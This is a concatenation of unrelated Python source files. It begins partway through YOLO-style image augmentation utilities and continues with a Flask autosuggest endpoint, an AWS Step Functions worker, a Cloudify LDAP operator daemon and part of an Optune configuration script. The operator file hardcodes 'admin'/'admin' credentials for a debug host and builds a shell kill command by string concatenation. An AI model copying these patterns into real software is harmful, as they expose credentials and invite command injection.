return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
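# Note (illustrative sketch of the geometry above): with img_size s, the mosaic canvas is
# 2s x 2s and the random centre (xc, yc) falls within mosaic_border of the middle, so
# random_perspective's border crop ultimately yields an s x s training image containing
# parts of all four tiles.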
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padx
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + pady
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padx
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + pady
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
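# Usage sketch (illustrative; `im0` is assumed to be a BGR numpy image from cv2.imread):
#   im, ratio, (dw, dh) = letterbox(im0, new_shape=640)
# `ratio` holds the (width, height) scale factors and (dw, dh) the per-side padding,
# which __getitem__ above uses to map normalized xywh labels into letterboxed pixels.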
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
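# Example (illustrative): with the defaults above, a box whose augmented width or height
# drops below 2 px, whose area shrinks to 10% or less of its pre-augment area, or whose
# aspect ratio exceeds 20:1 is filtered out of `targets` by random_perspective.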
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
suggest.py
|
from flask import request
from flask import jsonify
from flask_cors import cross_origin
import threading
from autosuggest import AutoSuggestor
def load_in_background(nlp, app, queries_path, stops_path):
suggester = AutoSuggestor(
queries_path=queries_path,
stops_path=stops_path,
build_precount=False
)
app.logger.info("💡 suggestion ready")
nlp.set('suggester', suggester)
def add_suggest(app, nlp, queries_path, stops_path):
thread = threading.Thread(target=load_in_background, args=(nlp, app, queries_path, stops_path))
nlp.queue('suggester', thread)
@app.route('/api/suggest', methods=['GET'])
@cross_origin()
def suggest(): # pylint: disable=unused-variable
suggester = nlp.get('suggester', check_ready=True)
input = request.args.get('q')
results = suggester.auto_suggest_fast(input, nb_next_words=12)
results = [r[0] for r in results]
return jsonify(results)
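# Example request (illustrative; host/port depend on how the Flask app is served):
#   GET /api/suggest?q=how+to
# returns a JSON array of up to 12 suggestions produced by
# AutoSuggestor.auto_suggest_fast, e.g. ["how to install", "how to update", ...].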
|
worker.py
|
"""Activity task polling and execution.
You can provide your own workers: the interface to the activities is
public. This module's worker implementation uses threading, and is
designed to be resource-managed outside of Python.
"""
import json
import uuid
import time
import socket
import traceback
import typing as T
import logging as lg
from botocore import exceptions as bc_exc
from . import _util
_logger = lg.getLogger(__name__)
_host_name = socket.getfqdn(socket.gethostname())
threading = None
def _import_threading():
"""Import ``threading`` multi-threading module."""
global threading
if threading is None:
import threading
class WorkerCancel(KeyboardInterrupt):
"""Workflow execution interrupted by user."""
def __init__(self, *args, **kwargs):
msg = (
"Activity execution cancelled by user. "
"This could be due to a `KeyboardInterrupt` during execution, "
"or the worker was killed during task polling.")
super().__init__(msg, *args, **kwargs)
class TaskExecution:
"""Execute a task, providing heartbeats and catching failures.
Args:
activity (sfini.activity.CallableActivity): activity to execute
task of
task_token: task token for execution identification
task_input: task input
session: session to use for AWS communication
"""
def __init__(
self,
activity,
task_token: str,
task_input: _util.JSONable,
*,
session: _util.AWSSession = None):
self.activity = activity
self.task_token = task_token
self.task_input = task_input
self.session = session or _util.AWSSession()
_import_threading()
self._heartbeat_thread = threading.Thread(target=self._heartbeat)
self._request_stop = False
def __str__(self):
return "%s - %s" % (self.activity.name, self.task_token)
__repr__ = _util.easy_repr
def _send(self, send_fn: T.Callable, **kw):
"""Send execution update to SFN."""
if self._request_stop:
_logger.warning("Skipping sending update as we've already quit")
return
return send_fn(taskToken=self.task_token, **kw)
def _report_exception(self, exc: BaseException):
"""Report failure."""
_logger.info("Reporting task failure for '%s'" % self, exc_info=exc)
tb = traceback.format_exception(type(exc), exc, exc.__traceback__)
self._send(
self.session.sfn.send_task_failure,
error=type(exc).__name__,
cause="".join(tb))
self._request_stop = True
def report_cancelled(self):
"""Cancel a task execution: stop interaction with SFN."""
fmt = "Reporting task failure for '%s' due to cancellation"
_logger.info(fmt % self)
self._send(
self.session.sfn.send_task_failure,
error=WorkerCancel.__name__,
cause=str(WorkerCancel()))
self._request_stop = True
def _report_success(self, res: _util.JSONable):
"""Report success."""
fmt = "Reporting task success for '%s' with output: %s"
_logger.debug(fmt % (self, res))
self._send(self.session.sfn.send_task_success, output=json.dumps(res))
self._request_stop = True
def _send_heartbeat(self):
"""Send a heartbeat."""
_logger.debug("Sending heartbeat for '%s'" % self)
try:
self._send(self.session.sfn.send_task_heartbeat)
except bc_exc.ClientError as e:
self._request_stop = True
if e.response["Error"]["Code"] != "TaskTimedOut":
raise
_logger.error("Task execution '%s' timed-out" % self)
def _heartbeat(self):
"""Run heartbeat sending."""
heartbeat = self.activity.heartbeat
while True:
t = time.time()
if self._request_stop:
break
self._send_heartbeat()
            time.sleep(max(0.0, heartbeat - (time.time() - t)))
def run(self):
"""Run task."""
self._heartbeat_thread.start()
t = time.time()
try:
res = self.activity.call_with(self.task_input)
except KeyboardInterrupt:
self.report_cancelled()
return
except Exception as e:
self._report_exception(e)
return
fmt = "Task '%s' completed in %.6f seconds"
_logger.debug(fmt % (self, time.time() - t))
self._report_success(res)
class Worker:
"""Worker to poll for activity task executions.
Args:
activity (sfini.activity.CallableActivity): activity to poll and
run executions of
name: name of worker, used for identification, default: a
combination of UUID and host's FQDN
session: session to use for AWS communication
"""
_task_execution_class = TaskExecution
def __init__(
self,
activity,
name: str = None,
*,
session: _util.AWSSession = None):
self.activity = activity
        self.name = name or "%s-%s" % (_host_name, str(uuid.uuid4())[:8])
self.session = session or _util.AWSSession()
_import_threading()
self._poller = threading.Thread(target=self._worker)
self._request_finish = False
self._exc = None
def __str__(self):
return "%s [%s]" % (self.name, self.activity.name)
__repr__ = _util.easy_repr
def _execute_on(self, task_input: _util.JSONable, task_token: str):
"""Execute the provided task.
Args:
task_input: activity task execution input
task_token: task execution identifier
"""
_logger.debug("Got task input: %s" % task_input)
execution = self._task_execution_class(
self.activity,
task_token,
task_input,
session=self.session)
if self._request_finish:
execution.report_cancelled()
else:
execution.run()
def _poll_and_execute(self):
"""Poll for tasks to execute, then execute any found."""
while not self._request_finish:
fmt = "Polling for activity '%s' executions"
_logger.debug(fmt % self.activity)
resp = self.session.sfn.get_activity_task(
activityArn=self.activity.arn,
workerName=self.name)
if resp.get("taskToken", None) is not None:
input_ = json.loads(resp["input"])
self._execute_on(input_, resp["taskToken"])
def _worker(self):
"""Run polling, catching exceptins."""
try:
self._poll_and_execute()
except (Exception, KeyboardInterrupt) as e:
_logger.warning("Polling/execution failed", exc_info=e)
self._exc = e # send exception to main thread
self._request_finish = True
def start(self):
"""Start polling."""
from . import activity
if not isinstance(self.activity, activity.CallableActivity):
raise TypeError("Activity '%s' cannot be executed" % self.activity)
_util.assert_valid_name(self.name)
_logger.info("Worker '%s': waiting on final poll to finish" % self)
self._poller.start()
def join(self):
"""Block until polling exit."""
try:
self._poller.join()
except KeyboardInterrupt:
_logger.info("Quitting polling due to KeyboardInterrupt")
self._request_finish = True
return
except Exception:
self._request_finish = True
raise
if self._exc is not None:
raise self._exc
def end(self):
"""End polling."""
_logger.info("Worker '%s': waiting on final poll to finish" % self)
self._request_finish = True
def run(self):
"""Run worker to poll for and execute specified tasks."""
self.start()
self.join()
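# Minimal usage sketch (illustrative; `my_activity` is assumed to be a registered
# sfini.activity.CallableActivity and AWS credentials come from the default session):
#   worker = Worker(my_activity)
#   worker.run()   # start() + join(): polls get_activity_task and executes tasks
#   # call worker.end() from another thread or signal handler to stop polling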
|
tasks.py
|
########
# Copyright (c) 2019 Cloudify Platform All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cloudify import ctx
from cloudify_rest_client import CloudifyClient
from cloudify import manager
from .operator import Operator
from flask import Flask, abort, request, jsonify
from threading import Thread
from datetime import datetime
import logging
import logging.handlers
import time
import os
def start(**kwargs):
''' Starts the operator process
'''
logger = configure_logging()
logger.info("Starting LDAP operator")
# For DEBUGGING locally
if ctx._local:
client = CloudifyClient(
host = '10.239.2.83',
username = 'admin',
password = 'admin',
tenant = 'default_tenant')
else:
client = manager.get_rest_client()
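    # Daemonize via double fork (descriptive sketch of the flow below): the parent waits
    # on the pipe for the grandchild's PID and records it in runtime_properties so stop()
    # can kill it; the first child detaches (chdir/setsid/umask), forks again, writes the
    # grandchild's PID back through the pipe and exits; the grandchild runs the Flask REST
    # thread and the Operator loop.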
r,w = os.pipe()
pid = os.fork()
if pid > 0:
# wait for pid on pipe
os.close(w)
for i in range(10):
pid = os.read(r, 10)
if pid == "":
time.sleep(1)
logger.debug("waiting for pid")
continue
else:
ctx.instance.runtime_properties["pid"] = str(pid)
break
if pid == "":
logger.error("ERROR: Failed to get child PID")
os.close(r)
return
os.close(r)
os.chdir("/tmp")
os.setsid()
os.umask(0)
close_fds([w])
pid = os.fork()
if pid > 0:
os.write(w,str(pid))
os.close(w)
os._exit(0)
os.close(w)
# Needed by Flask
os.open("/dev/null", os.O_RDONLY)
os.open("/dev/null", os.O_WRONLY)
# Start REST server
app = Flask(__name__)
# init stats
stats = {}
stats['errcnt'] = 0
stats['actions'] = []
# init config
config = {}
config['log_location'] = '/tmp/log'
try:
set_routes(app, ctx.node.properties, stats, config, logger)
rest = Thread(target=app.run, kwargs={"debug":False})
rest.start()
except Exception as e:
logger.error(str(e))
os._exit(0)
# TODO Deep copy of properties to runtime_properties.
# To enable changes at runtime
Operator().operate(client, ctx.node.properties, stats, logger)
os._exit(0)
def stop(**kwargs):
''' Stops the operator process
'''
pid = ctx.instance.runtime_properties['pid']
ctx.logger.info("stopping process {}".format(pid))
res = os.system("kill "+str(pid))
if res != 0:
ctx.logger.error("kill failed for pid ".format(pid))
def operate(client, properties, stats):
''' OPERATOR MAIN LOOP '''
while True:
pass
def close_fds(leave_open=[0, 1, 2]):
fds = os.listdir(b'/proc/self/fd')
for fdn in fds:
fd = int(fdn)
if fd not in leave_open:
try:
os.close(fd)
except Exception:
pass
def configure_logging():
''' adjust below for logging needs '''
LOGDIR_NAME = 'operator.logs'
LOGFILE_NAME = LOGDIR_NAME + '/cfy_operator.log' #implementation should change this
LOGFORMAT = '%(asctime)s %(levelname)s %(message)s'
try:
os.mkdir("operator.logs")
except:
pass
logging.basicConfig(level=logging.DEBUG,
format=LOGFORMAT,
filename=LOGFILE_NAME,
filemode='w+')
logger = logging.getLogger('cfy_operator')
handler = logging.handlers.RotatingFileHandler(
LOGFILE_NAME, maxBytes=10**6, backupCount=2)
logger.addHandler( handler)
return logger
############################
# REST API
############################
def set_routes(app, properties, stats, config, logger):
@app.route('/')
def some_route():
return 'usage: TBD'
@app.route('/loglevel', methods=['GET','POST'])
def loglevel():
try:
if request.method == 'GET':
return '{"loglevel": ' + str(logger.getEffectiveLevel()) + '}'
elif request.method == 'POST':
body = request.json
if not body:
logger.error('unknown media type')
abort(415)
logger.info("body="+str(body))
if 'loglevel' not in body:
logger.error('loglevel key missing')
abort(400)
logger.setLevel(int(body['loglevel']))
except Exception as e:
logger.error("exception :"+e.message)
|
w2.py
|
#!/usr/bin/env python3
from __future__ import print_function
import sys
import os
import errno
import subprocess
import time
import calendar
import json
import select
import signal
import threading
import queue
# networking
import requests
import socket
import http.server
import socketserver
# 'compact' format json encode (no spaces)
json_enc = json.JSONEncoder(separators=(",",":")).encode
# debug
def dprint(*args):
print(*args, file=sys.stderr)
sys.stderr.flush()
# === const
INITIALIZER_NAME="initcfg.optune.io"
MEM_STEP=4096 # minimal useful increment in mem limit/reserve
CPU_STEP=0.001 # 1 millicore, highest resolution supported by k8s
Gi=1024*1024*1024
MAX_MEM=1*Gi
MAX_CPU=3.5
# === config ==============
# defaults
cfg = {
"url_pattern" : "https://us-central1-optune-saas-collect.cloudfunctions.net/metrics/{acct}/{app_id}/servo",
"account" : None,
"auth_token" : None,
"send_timeout" : 10,
"namespaces" : "default",
"appid" : "spec/containers/0/env/[JOBID]",
"sleeper_img" : "gcr.io/google_containers/pause-amd64:3.0"
}
# update from env
cfg["url_pattern"] = os.environ.get("OPTUNE_URL",cfg["url_pattern"])
cfg["account"] = os.environ.get("OPTUNE_ACCOUNT",cfg["account"])
cfg["auth_token"] = os.environ.get("OPTUNE_AUTH_TOKEN",cfg["auth_token"])
cfg["namespaces"] = os.environ.get("POD_NAMESPACES",cfg["namespaces"])
cfg["appid"] = os.environ.get("OPTUNE_APP_ID",cfg["appid"])
cfg["sleeper_img"] = os.environ.get("OPTUNE_SLEEPER_IMG",cfg["sleeper_img"])
# split into array for easy use
cfg["namespaces"] = cfg["namespaces"].split(",")
try:
debug = os.environ.get("OPTUNE_DEBUG",0)
debug = int(debug)
except Exception:
debug = 0
# === exceptions
class ApiError(Exception):
pass
class ConfigError(Exception):
pass
class UserError(Exception): # raised on invalid input data from remote OCO
pass
# ===
